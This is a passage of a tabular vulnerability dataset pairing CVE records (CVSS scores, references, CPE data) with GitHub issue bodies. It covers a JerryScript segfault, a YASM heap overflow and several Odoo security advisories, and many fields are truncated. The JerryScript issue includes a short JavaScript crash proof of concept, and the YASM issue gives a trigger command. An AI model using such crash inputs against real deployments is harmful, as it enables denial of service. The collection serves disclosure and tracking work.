"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/jerryscript-project/jerryscript/issues/5051"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartEx... | https://github.com/jerryscript-project/jerryscript/issues/5051 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"jerryscript-project",
"jerryscript"
] |
the following js cause a segmentation fault in jerryscript.
```
function test(){
function f(){
var f = test();
h = f();
}
return f;
}
let a = test();
c = a();
``` | segmentation fault in jerryscript | https://api.github.com/repos/jerryscript-project/jerryscript/issues/5051/comments | 2 | 2023-03-14T03:36:48Z | 2023-04-26T19:28:39Z | https://github.com/jerryscript-project/jerryscript/issues/5051 | 1,622,665,090 | 5,051 |
CVE-2023-30402 | 2023-04-25T16:15:09.590 | YASM v1.3.0 was discovered to contain a heap overflow via the function handle_dot_label at /nasm/nasm-token.re. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integr... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/yasm/yasm/issues/206"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6556F7-3880-452A-ABA9-1A8A14BA41F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcl... | https://github.com/yasm/yasm/issues/206 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"yasm",
"yasm"
] | yasm heap buffer overflow
I found a heap-buffer-overflow in yasm.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
How to trigger
Compile the program with AddressSanitizer
Run command $ ./yasm -s -o abc --force-strict $PoC
Details
ASAN report
$./yasm -s ... | yasm heap buffer overflow | https://api.github.com/repos/yasm/yasm/issues/206/comments | 1 | 2023-03-01T01:50:12Z | 2024-03-22T11:53:56Z | https://github.com/yasm/yasm/issues/206 | 1,604,082,214 | 206 |
CVE-2021-23166 | 2023-04-25T19:15:09.140 | A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read and write local files on the server. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107687"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107687 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23166](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23166)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23166](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23166)
**Component**: Core
**Credits**: Nils Hamerlinck (Trob... | [SEC] CVE-2021-23166 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107687/comments | 0 | 2022-12-10T23:00:32Z | 2022-12-10T23:00:33Z | https://github.com/odoo/odoo/issues/107687 | 1,489,087,046 | 107,687 |
CVE-2021-23176 | 2023-04-25T19:15:09.220 | Improper access control in reporting engine of l10n_fr_fec module in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote authenticated users to extract accounting information via crafted RPC packets. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107682"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107682 | [
"Issue Tracking",
"Mitigation",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23176](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23176)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23176](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23176)
**Component**: l10n_fr_fec
**Credits**: Florent Mirieu... | [SEC] CVE-2021-23176 - Improper access control in reporting engine o... | https://api.github.com/repos/odoo/odoo/issues/107682/comments | 0 | 2022-12-10T23:00:23Z | 2022-12-10T23:00:24Z | https://github.com/odoo/odoo/issues/107682 | 1,489,086,881 | 107,682 |
CVE-2021-23178 | 2023-04-25T19:15:09.283 | Improper access control in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows attackers to validate online payments with a tokenized payment method that belongs to another user, causing the victim's payment method to be charged instead. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107690"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107690 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23178](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23178)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23178](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23178)
**Component**: Online Payment
**Credits**: Parth Gajja... | [SEC] CVE-2021-23178 - Improper access control in Odoo Community 15.... | https://api.github.com/repos/odoo/odoo/issues/107690/comments | 0 | 2022-12-10T23:00:37Z | 2022-12-10T23:00:38Z | https://github.com/odoo/odoo/issues/107690 | 1,489,087,135 | 107,690 |
CVE-2021-23186 | 2023-04-25T19:15:09.340 | A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to access and modify database contents of other tenants, in a multi-tenant system. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107688"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107688 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23186](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23186)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23186](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23186)
**Component**: Core
**Credits**: Nils Hamerlinck (Trob... | [SEC] CVE-2021-23186 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107688/comments | 0 | 2022-12-10T23:00:34Z | 2022-12-10T23:00:34Z | https://github.com/odoo/odoo/issues/107688 | 1,489,087,076 | 107,688 |
CVE-2021-23203 | 2023-04-25T19:15:09.403 | Improper access control in reporting engine of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to download PDF reports for arbitrary documents, via crafted requests. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integr... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107695"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:14.0:*:*:*:community:*:*:*",
"matchCriteriaId": "4D952E47-04E1-4146-A3AA-3804A1AB52DA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/odoo/odoo/issues/107695 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-23203](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23203)
**Affects**: Odoo 14.0 through 15.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-23203](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23203)
**Component**: Report engine
**Credits**: Tiffany Ch... | [SEC] CVE-2021-23203 - Improper access control in reporting engine o... | https://api.github.com/repos/odoo/odoo/issues/107695/comments | 0 | 2022-12-10T23:00:46Z | 2022-12-10T23:00:48Z | https://github.com/odoo/odoo/issues/107695 | 1,489,087,315 | 107,695 |
CVE-2021-26263 | 2023-04-25T19:15:09.470 | Cross-site scripting (XSS) issue in Discuss app of Odoo Community 14.0 through 15.0, and Odoo Enterprise 14.0 through 15.0, allows remote attackers to inject arbitrary web script in the browser of a victim, by posting crafted contents. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107693"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:14.0:*:*:*:community:*:*:*",
"matchCriteriaId": "4D952E47-04E1-4146-A3AA-3804A1AB52DA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExclu... | https://github.com/odoo/odoo/issues/107693 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-26263](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26263)
**Affects**: Odoo 14.0 and 15.0 (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-26263](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26263)
**Component**: Discuss
**Credits**: Theodoros Malachias, ... | [SEC] CVE-2021-26263 - Cross-site scripting (XSS) issue in Discuss a... | https://api.github.com/repos/odoo/odoo/issues/107693/comments | 0 | 2022-12-10T23:00:43Z | 2022-12-10T23:00:44Z | https://github.com/odoo/odoo/issues/107693 | 1,489,087,216 | 107,693 |
CVE-2021-26947 | 2023-04-25T19:15:09.530 | Cross-site scripting (XSS) issue Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier, allows remote attackers to inject arbitrary web script in the browser of a victim, via a crafted link. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107694"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107694 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-26947](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26947)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-26947](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26947)
**Component**: Core
**Credits**: Nils Hamerlinck (Trob... | [SEC] CVE-2021-26947 - Cross-site scripting (XSS) issue Odoo Communi... | https://api.github.com/repos/odoo/odoo/issues/107694/comments | 0 | 2022-12-10T23:00:44Z | 2022-12-10T23:00:45Z | https://github.com/odoo/odoo/issues/107694 | 1,489,087,256 | 107,694 |
CVE-2021-44460 | 2023-04-25T19:15:09.600 | Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows users with deactivated accounts to access the system with the deactivated account and any permission it still holds, via crafted RPC requests. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107685"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "97EB1578-CFCC-4301-AEE7-DBBC6A92BC25",
"versionEndExcluding": null,
"versionEndIncluding": "13.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107685 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44460](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44460)
**Affects**: Odoo 13.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44460](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44460)
**Component**: Core
**Credits**: Xavier Morel
Imprope... | [SEC] CVE-2021-44460 - Improper access control in Odoo Community 13.... | https://api.github.com/repos/odoo/odoo/issues/107685/comments | 0 | 2022-12-10T23:00:28Z | 2022-12-10T23:00:29Z | https://github.com/odoo/odoo/issues/107685 | 1,489,086,977 | 107,685 |
CVE-2021-44461 | 2023-04-25T19:15:09.670 | Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0 through 15.0, allows remote attackers who are able to control the contents of accounting journal entries to inject arbitrary web script in the browser of a victim. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107686"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "D3FA7C86-7FC1-4310-9945-EE9265577C5D",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclu... | https://github.com/odoo/odoo/issues/107686 | [
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44461)
**Affects**: Odoo 13.0 to 15.0 (Enterprise Edition)
**CVE ID**: [CVE-2021-44461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44461)
**Component**: Accounting (account_accountant)
Cross-site scripting (XSS... | [SEC] CVE-2021-44461 - Cross-site scripting (XSS) issue in Accountin... | https://api.github.com/repos/odoo/odoo/issues/107686/comments | 0 | 2022-12-10T23:00:30Z | 2022-12-10T23:00:31Z | https://github.com/odoo/odoo/issues/107686 | 1,489,087,009 | 107,686 |
CVE-2021-44465 | 2023-04-25T19:15:09.727 | Improper access control in Odoo Community 13.0 and earlier and Odoo Enterprise 13.0 and earlier allows authenticated attackers to subscribe to receive future notifications and comments related to arbitrary business records in the system, via crafted RPC requests. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107692"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "97EB1578-CFCC-4301-AEE7-DBBC6A92BC25",
"versionEndExcluding": null,
"versionEndIncluding": "13.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107692 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44465](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44465)
**Affects**: Odoo 13.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44465](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44465)
**Component**: Website Mail
**Credits**: Swapnesh Shah... | [SEC] CVE-2021-44465 - Improper access control in Odoo Community 13.... | https://api.github.com/repos/odoo/odoo/issues/107692/comments | 0 | 2022-12-10T23:00:41Z | 2022-12-10T23:00:42Z | https://github.com/odoo/odoo/issues/107692 | 1,489,087,191 | 107,692 |
CVE-2021-44476 | 2023-04-25T19:15:09.783 | A sandboxing issue in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows authenticated administrators to read local files on the server, including sensitive configuration files. | {
"cvssMetricV2": null,
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
... | [
{
"source": "security@odoo.com",
"tags": [
"Issue Tracking",
"Patch",
"Vendor Advisory"
],
"url": "https://github.com/odoo/odoo/issues/107684"
},
{
"source": "security@odoo.com",
"tags": null,
"url": "https://www.debian.org/security/2023/dsa-5399"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "C5B912BD-1FB4-418A-9CE3-FBE0903D70BA",
"versionEndExcluding": null,
"versionEndIncluding": "15.0",
"versionStartExclud... | https://github.com/odoo/odoo/issues/107684 | [
"Issue Tracking",
"Patch",
"Vendor Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - [CVE-2021-44476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44476)
**Affects**: Odoo 15.0 and earlier (Community and Enterprise Editions)
**CVE ID**: [CVE-2021-44476](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44476)
**Component**: Core
**Credits**: Toufik Ben Jaa
A san... | [SEC] CVE-2021-44476 - A sandboxing issue in Odoo Community 15.0 and... | https://api.github.com/repos/odoo/odoo/issues/107684/comments | 0 | 2022-12-10T23:00:26Z | 2022-12-10T23:00:27Z | https://github.com/odoo/odoo/issues/107684 | 1,489,086,933 | 107,684 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.